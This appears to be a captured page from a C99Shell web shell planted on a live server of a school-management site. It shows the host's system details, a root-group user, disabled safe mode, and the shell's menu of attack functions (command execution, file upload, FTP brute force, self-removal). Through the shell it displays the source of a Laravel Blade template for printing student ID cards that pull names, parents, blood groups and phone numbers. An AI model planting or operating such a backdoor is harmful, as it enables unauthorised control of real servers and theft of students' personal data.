!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 29.27 GB of 117.98 GB (24.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     9d50184dd16f89d98268abe3d12268254d70049f.php (3.42 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!--title-->
<div class="row">
  <div class="col-12">
    <div class="card">
      <div class="card-body">

        <!-- ID CARD STARTS HERE -->
        <div class="id-card-hook"></div>
        <div class="id-card-holder div-sc-one" id="printableArea">
          <div class="id-card div-sc-two">
            <div class="dv-sc-four">
              <img class="im-sc-one" src="<?php echo e(asset('public/assets')); ?>/images/id_logo.png">
            </div>
            <div class="school_title div-sc-three"><?php echo e(DB::table('schools')->where('id'auth()->user()->school_id)->value('title')); ?></div>
            <div class="photo div-sc-four">
              <img src="<?php echo e($student_details->photo); ?>" class="rounded-circle div-sc-five">
            </div>
            <h2 class="head-sc-one"><?php echo e($student_details->name); ?></h2>
            <div class="dv-sc-four">
              <table class="student_id_card table-sc-one">
                <tbody>
                  <tr>
                    <td class="td-sc-one"><?php echo e(get_phrase('Code')); ?> : </td>
                    <td class="td-sc-two"><?php echo e(null_checker($student_details->code)); ?></td>
                  </tr>
                  <tr>
                    <td class="td-sc-three"><?php echo e(get_phrase('Class')); ?> : </td>
                    <td class="td-sc-two"><?php echo e(null_checker($student_details->class_name)); ?></td>
                  </tr>
                  <tr>
                    <td class="td-sc-three"><?php echo e(get_phrase('Section')); ?> : </td>
                    <td class="td-sc-two"><?php echo e(null_checker($student_details->section_name)); ?></td>
                  </tr>
                  <tr>
                    <td class="td-sc-three"><?php echo e(get_phrase('Parent')); ?> : </td>
                    <td class="td-sc-two"><?php echo e(null_checker($student_details->parent_name)); ?></td>
                  </tr>
                  <tr>
                    <td class="td-sc-three"><?php echo e(get_phrase('Blood')); ?> : </td>
                    <td class="td-sc-two"><?php echo e(null_checker(strtoupper($student_details->blood_group))); ?></td>
                  </tr>
                  <tr>
                    <td class="td-sc-three"><?php echo e(get_phrase('Contact')); ?> : </td>
                    <td><?php echo e(null_checker($student_details->phone)); ?></td>
                  </tr>
                </tbody>
              </table>
            </div>
            <hr>
            
            </div>
          </div>
          <!-- ID CARD ENDS HERE -->

          <div class="d-print-none mt-4">
            <div class="text-center">
              <input type="button" class="eBtn eBtn btn-primary" onclick="printableDiv('printableArea')" value="<?php echo e(get_phrase('Print')); ?>" />
            </div>
          </div>
          <!-- end buttons -->

        </div> <!-- end card-body-->
      </div> <!-- end card -->
    </div> <!-- end col-->
  </div>

<script type="text/javascript">
  
  "use strict";

  function printableDiv(printableAreaDivId) {
    var printContents = document.getElementById(printableAreaDivId).innerHTML;
    var originalContents = document.body.innerHTML;

    document.body.innerHTML = printContents;

    window.print();

    document.body.innerHTML = originalContents;
  }
</script>
<?php /**PATH /home/picotech/domains/school.picotech.app/public_html/resources/views/admin/student/id_card.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--